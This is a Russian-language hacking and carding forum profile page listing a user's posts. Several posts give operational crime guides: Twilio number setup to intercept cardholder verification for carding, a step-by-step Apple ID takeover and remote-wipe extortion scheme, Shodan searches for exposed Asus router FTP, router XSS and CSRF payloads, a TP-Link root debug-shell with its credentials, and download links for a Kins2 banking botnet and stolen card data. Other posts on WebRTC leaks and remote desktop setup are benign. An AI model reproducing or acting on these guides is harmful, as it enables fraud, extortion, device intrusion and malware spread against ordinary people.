Рады видеть вас на Ghost-Club.com

Зарегистрируйтесь сейчас, чтобы то бы вступить в наш клуб. После регистрации и входа в систему вы сможете создавать темы, отвечать на существующие темы, давать репутацию другим пользователям, получить свой собственный мессенджер, размещать обновления статуса, управлять профилем и многое другое. Это сообщение будет удалено после входа в систему.

Xaker

VIP
  • Content Count

    36
  • Joined

  • Last visited

  • Days Won

    3
17

Community Reputation

17 Хороший

Контакты

  • ICQ
    485865

Информация

  • Пол
    Мужчина
  • Интересы
    интернет моя стихия
  1. Не особо легальный зароботок
  2. Потверждаю,Wi FI сломать возможно,методом перехвата пакетов на андройде.Постараюсь написать статью!
  3. Зачастую при вбиве в мерчи нам часто надо вводить моб номер телефона холдера,и проходить верификацию через смс или прозвон. Теперь можно принимать прозвон с палки и шопов прямо на свой мобильный телефон,смс на акк. Нам понадобится - Палка для пополнения акка и телефон на андроиде. Заходим на twilio.com и регистрируемся на почту которая в палке. выбираем номер любой страны и штата и покупаем его. После идем на плеймаркет и скачиваем приложение twillio. Потом идем на twilioid.com где нам выдаст такую вот форму Сюда вводим данные которые прописанны в нашем аккаунте, после чего получаем код приложения. Прикрепляем код приложение к профилю и все готово. Теперь звонки будут поступать к нам на приложения а смс-ки на аккаунт.
  4. Доброго времени суток Уважаемые читатели! Сегодня Мы рассмотрим как блокируется Apple ID с дальнейшим профитом. Не забывайте, что перед носом весит статья 163 УК РФ. Поэтому юзаем все то - что связанно с анонимностью. Материал для работы: - база ящиков, прочеканная под наши параметры(apple). - база пустых ящиков(саморегов), если есть время, можете и сами регистрировать. - кошельки ЭПС(куда будете принимать средства) регистрируйте естественно на себя. - левый зарубежный ящик(поддерживать связь с жертвой). P.S. Народ, ЭПС и ящики регистрируйте не под своим ip. Будьте аккуратны! И так начнем! 1. Заходим на ящик жертвы. В поисковике набираем слово "apple". 2. Ищем письмо, где суппорт Apple будет указывать Имя(Иван) и Фамилию(Иванов) жертвы. 3. Переходим по линку на сайт для сброса пароля и жмем "Забыли Apple ID". https://iforgot.apple.com/password/v...language=RU-RU вводим имя/фамилия/ящик@mail.ru и жмем "Далее". Выбираем первый вариант(Аутентификация по e-mail) и жмем далее. 4. На почту пришло письмо о сбросе пароля, жмем "Выполнить сброс сейчас". Вводим новый пароль и нажимаем "Далее". Пароль сброшен. 5. Переходим на сайт www.icloud.com и вводим логин/пароль. 6. Жмем "Найти Iphone" и смотрим сколько устройств привязано в icloud. Видим что привязано только одно устройство, оставляем все как есть и выходим. 7. Переходим на сайт https://appleid.apple.com/account/home Жмем "Управлять Apple ID", вводим логин/пароль. 8. Перешли в личный кабинет. Вводим свой новый(левый) почтовый ящик + меняем Имя/Фамилию(любые данные) и стираем номер телефона(если он есть). На новую почту упадет письмо о подтверждении. 9. Открываем письмо и переходим на страницу подтверждения. 10. Вводим новую почту/пароль и жмем "Подтвердить адрес". 11. Обновляем личный кабинет и видим что под новой почтой написано "Подтверждено" 12. Снова заходим в icloud (логин уже новый). 13. Жмем "Найти Iphone", выбираем Ipad. На данный момент Ipad в Оффлайне, но это не помешает нам его стереть, а точнее сделать запрос на стирание данных. После того как жертва включит Ipad, все данные будут стерты. 14. Набираем сообщение которое появится после стирание данных(оставляем свои контакты) и жмем "Готово". Видим на скриншоте "Стирание запрощено меньше минуты назад" Ждем сообщение от жертвы. Закончив работу, обязательно почистите куки. Удалите все сообщения на почте жертвы, которые приходили во время работы от суппорта Apple. На почту можно поставить фильтры спама. [email protected] [email protected] [email protected] P.S. Попадались почты без привязанных девайсов в icloud, поэтому сразу после сброса пароля, заходим в icloud. Цену за один девайс ставьте не больше 1000. P.S.S. Не пренебрегайте анонимностью! Береженого бог бережет а небереженого конвой стережет! Удачи!
  5. Сидит человек за компьютером, всё настроено как надо. VPN / Socks / Виртуалка / Шифродиски / Антидетекты Да, человек может даже сидеть по USB модему Почти в любом современном компьютере есть WIFI адаптер. Правильно? Адаптер сканирует сети вокруг (любые соседние точки доступа) Что-то на подобие http://fastpic.ru/vi...97786.jpeg.html Так вот, такая конфигурация СОСЕДНИХ СЕТЕЙ (их BSSID, ESSID и Power. По Русски, названия соседних сетей, вы их видите, когда куда-то коннектитесь, их ID и сила сигнала). Такая конфигурация BSSID + ESSID + Power есть только у Вас, только в том помещении, где вы находитесь, это вас однозначно идентифицирует! Это ваш Fingerprint. И без разницы на любые методы анонимности, соксы, настройки системы. Всё это идёт лесом! А знаете ли вы, что Ваш Браузер имеет доступ к вашему WIFI адаптеру? А знаете ли вы, что в зашифрованном(вы никогда не узнаете, что эти данные уже переданы в Google) виде Firefox и Chrome могут передавать эти данные прямо через браузер? Дальше, вы прекрасно понимаете, что остаётся только сопоставить информацию по точкам доступа (например, с вашими соседями, ведь у них в окружении так же будет тот же набор соседей, соседними точками доступа, вашими мобилками, которые лежат рядом с вами, андройдами, айфонами), чтобы вычислить ваше реальное местоположение. Да, сама виртуалка тоже имеет доступ к вашим физическим устройствам (не смотря на эмуляцию железа), теоретически (я не проверял информацию), может так же дать эти данные внутри виртуалки. Не задумывались о таком взгляде на безопасность?
  6. Спарсил маленько СС ...на валид не трогал,да и не надо мне) https://www.sendspace.com/file/azo5dc
  7. Угораешь ты жестко конечно :-D Это буклетик для будущих арестантов
  8. В начале 2015 года компания Asus исправила критичную уязвимость в своих роутерах. «Дыра» была в службе по имени infosvr, использующейся утилитами Asus для облегчения настройки роутера путём его автоматического обнаружения в локальной сети. Уязвимость позволяла выполнять любые команды с правами root (ведь infosvr тоже root), что давало злоумышленнику полный контроль над системой. Но Asus выпустила исправленные прошивки. Теперь это всё в прошлом. Или нет? Хм… А как часто обыватели обновляют прошивки на своих роутерах? 1)Идём на shodan.io 2)Регистрируемся 3)Забиваем в поиск "port:21 asus 230" 4)Фильтруем по стране/городу/провайдеру 5)Вбиваем в адресную строку "ftp://"+адреса(лучше в виндовый эксплорер,там удобнее) 6)Получаем доступ к открытой файлопомойке ничего не подозревающей жертвы. 7)Профит!
  9. Все работает,в приоретете старые прошивки
  10. 1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере GET /doesnotexist HTTP/1.1 Host: 192.168.1.1 Referer: http://fent"> Connection: keep-alive 2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr Host: <ip> Referer: http://<ip>/maintenance/tools_test.htm Authorization: Basic blablabla== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+ 3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос: http://<ip>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED </ip></ip></ip> Еще вот интересный дебаг-шелл -Данная уязвимость позволяет злоумышленнику выполнить произвольный код с root правами. -Для эксплуатации уязвимости злоумышленнику достаточно:сформировать HTTP-запрос к /userRpmNatDebugRpm26525557/linux_cmdline.html -использовать учётную запись логин osteam, пароль 5up дальше можно выполнять произвольный код с root-правами В устройствах TP-Link WDR740ND, WDR740N, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N обнаружен дебаг-шелл. Уязвимости присутствуют в официальных прошивках, статус критический. Следите за обновлениями ПО на сайте TP-Link, если они вообще будут выпущены. По возможности, используйте альтернативные прошивки DD-WRT, OpenWRT и т.п. Тестил сам все пашахло.
  11. Делаю раздачку ботнета Kins2 Его возможности: -Grabs Firefox Latest -Grabs Chrone Latest - Grabs IE Latest -Grab POP3/OutLook Logins, Grabs FTP, Shell Logins -Backconnect Module -VNC Module -Anti-Rapport -Anti-tracker https://www.sendspace.com/file/v0aiij
  12. Наверное у каждого из нас была ситуация, наподобие такой: Приехал на работу\учебу, и понял что забыл на домашнем ПК какой-то файл\документ, а ехать домой совершенно не вариант. Ну или просто забыл название фильма который недавно смотрел, и хочешь срочно вспомнить. Для этого мы будем использовать связку Wake-on-lan и RDP Пример настройки будет проводится на примере компьютера с windows 8.1 pro и роутере d-link dir 615 со СТАТИЧЕСКИМ IP адресом Настройка компьютера 1. Настройка WON (Wake-on-lan) Wake-on-LAN — технология, позволяющая удалённо включить компьютер посредством отправки через локальную сеть специальной последовательности байтов — пакета данных (так называемого 'magic packet') Для этого нам нужно 1.1 «Железо» компьютера должно удовлетворять следующим требованиям: -Источник питания, должен соответствовать стандарту ATX 2.01 -Материнская плата должна поддерживать Wake-on-LAN -Сетевая плата (в виде платы расширения либо встроенная в материнскую плату) должна поддерживать Wake-on-LAN -Если используется внешняя (не встроенная в материнскую плату) сетевая плата, и хотя бы одна из этих плат не соответствуют стандарту PCI 2.2 или более позднему, то необходим также специальный трёхпроводной кабель для соединения разъёмов Wake-on-LAN на материнской и сетевой платах 1.2 В диспетчере устройств(Система-диспетчер устройств-сетевые адаптеры-наш сетевой адаптер-свойства-управление электропитанием) необходимо настроить управление питанием сетевого адаптера следующим образом: 1.3 Далее, следует в настройках BIOS материнской платы включить возможность пробуждения компьютера устройствами на шине PCI и PCI-Express. Обычно, это делается в разделе «Power Management Setup», или «ACPI Configuration» и т.п. и называется как-то так: «Wake-Up by PCI device», «Wake-Up by PCI-E device», «Power on by Ethernet Card». В зависимости от версии BIOS, это может выглядеть так: Или 1.4 Иногда разрешения режима удаленного включения электропитания в настройках BIOS бывает недостаточно. В этих случаях необходимо открыть: система-диспетчер устройств-сетевые адаптеры-наш сетевой адаптер-свойства-дополнительно, найти параметр пробуждения и установить ему «правильное» значение. Пример настройки для пары разных адаптеров: Или 2. Настройка RDP RDP (Remote Desktop Protocol) — протокол удалённого рабочего стола 2.1 Разрешаем входящие RDP подключения на компьютере: Осуществлять ВХОДЯЩИЕ подключение через Удалённый рабочий стол возможно к следующим редакциям ОС Windows: Windows XP Professional; Windows 7/8.1 Professional; Windows 7/8.1 Ultimate; Windows 7/8.1 Corporate. В Windows XP Starter, Home Edition, в Windows Vista/7/8/8.1 Starter, Home Basic, Home Premium возможность входящих подключений отсутствует. Открываем Свойства системы (WIN+Break) - Дополнительные параметры системы - Удалённый доступ и настраиваем так, как показано на скрине Так как мы собираемся подключатся по своей учетной записи (предполагается что она имеет права администратора) то на этом настройка компьютера заканчивается. Настройка роутера 1. Для RDP Проброс порта 3389 В роутерах D-link данная настройка называется Virtual Server либо Port Forwarding Заходим в настройки нашего роутера (для dlink 192.168.0.1 в адресной строке браузера) Вкладка Advanced и параметр Virtual Server (либо Port Forwarding соответственно) и настраиваем так, как показано на скрине (При этом, в поле IP Address указываем локальный IP нашего компьютера, а в поле Public Port любой не стандартный свободный порт 2. Для WOL Настраиваем на роутере проброс порта UDP 9 на ШИРОКОВЕЩАТЕЛЬНЫЙ адрес нашей внутренней сети. (Для справки - широковешательный - это такой адрес, где последний октет (последнее число в адресе) - заменяется на 255. Так для подсети 192.168.0.0/24 широковещательный адрес будет 192.168.0.255) Не забываем в поле IP Address указать локальный IP нашего компьютера Готово ! Для проверки Включения используем Сайт http://www.wakeonlan.ru/ Программа для андройд https://play.google.com/store/apps/details?id=at.increase.wakeonlan Для проверки удаленного доступа используем (при подключении указываем ip: port( без пробела,где port- public port указанный в настройках роутера в параметре RDP ПК с ос windows Пуск-выполнить-mstsc используемый материал: http://compfixer.info/remote-access-workstation-behind-router/ http://manaeff.ru/forum/viewtopic.php?t=1117&p=1409 полный материал: http://zyxel.ru/kb/2122 - Wake on LAN через интернет-центр Zyxel серии Keenetic
  13. WebRTC (Web Real-Time Communication) - технология с открытым исходным кодом, позволяющая передавать потоковые данные между браузерами по технологии "точка-точка" (p2p). WebRTC встроен по умолчанию в последних версиях Firefox, Chrome/Chromium, Opera и позволяет производить соединение между двумя и более браузерами для видео/аудио-звонков и не только. Почему не безопасно? Дело в том, что для соединения по принципу p2p необходимо знать реальный IP-адрес и WebRTC эту информацию бесстыдно сливает. Даже если вы сидите под TOR/VPN то не составит особого труда узнать ваш локальный IP-адрес в сети и на стороне, например, VPN-сервера. А с использованием уязвимостей можно определить ваш реальный IP, за которым вы скрываетесь. Как проверить Вот ссылочка(клик) Смотрим строку WebRTC, если отключено то N/A, Если включено будет написан ваш Ip. Как отключить Firefox Вызываем скрытые настройки по about:config в адресной строке, ищем параметр media.peerconnection.enabled, выставляем его в false. Chrome/Chromium Отключается лишь установкой небольшого расширения (~10 кб): WebRTC Block, правда локальный IP адрес браузер не перестаёт светить.